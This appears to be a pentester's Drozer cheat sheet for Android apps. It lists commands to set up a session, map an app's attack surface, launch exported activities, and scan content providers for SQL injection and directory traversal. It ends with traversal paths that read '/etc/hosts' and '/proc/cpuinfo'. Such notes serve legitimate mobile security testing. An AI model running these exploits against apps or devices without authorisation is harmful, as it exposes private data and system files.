Drozer

[Terminal] Start a drozer session

1. open drozer-agent application inside android emulator, toggle it on.

2. open Terminal inside linux host machine, type the following to establish communication between drozer and drozer-agent.

adb forward tcp:31415 tcp:31415

3. open Terminal inside windows host machine, type the following to start drozer.

drozer console connect

[Drozer] Find the package name of the vulnerable application

run app.package.list -f <string>

[Drozer] Show package information

run app.package.info -a <package_name>

[Drozer] Identify attack surface

run app.package.attacksurface <package_name>

[Drozer] Exploit exported activities

List exported activities

run app.activity.info -a <package_name>

Invoke exported activities

run app.activity.start -a <package_name> <exported_activity_name>

[Drozer] Exploit exported content providers

Find accessible content URIs

run scanner.provider.finduris -a <package_name>

SQLi vulnerability

List accessible SQLi injection points and accessible content URIs.

run scanner.provider.injection -a <package_name>

Display SQL tables for the package name if it is vulnerable to SQLi.

run scanner.provider.sqltables -a <package_name>

[CRUD] query the content.

[CRUD] insert the content.

[CRUD] update the content.

[CRUD] delete the content.

Directory traversal vulnerability

List accessible content URIs that is vulnerable to directory traversal.

run scanner.provider.traversal -a <package_name>

Exploit directory traversal vulnerability.

run app.provider.read <content_uri>../../etc/hosts
run app.provider.read <content_uri>../../proc/cpuinfo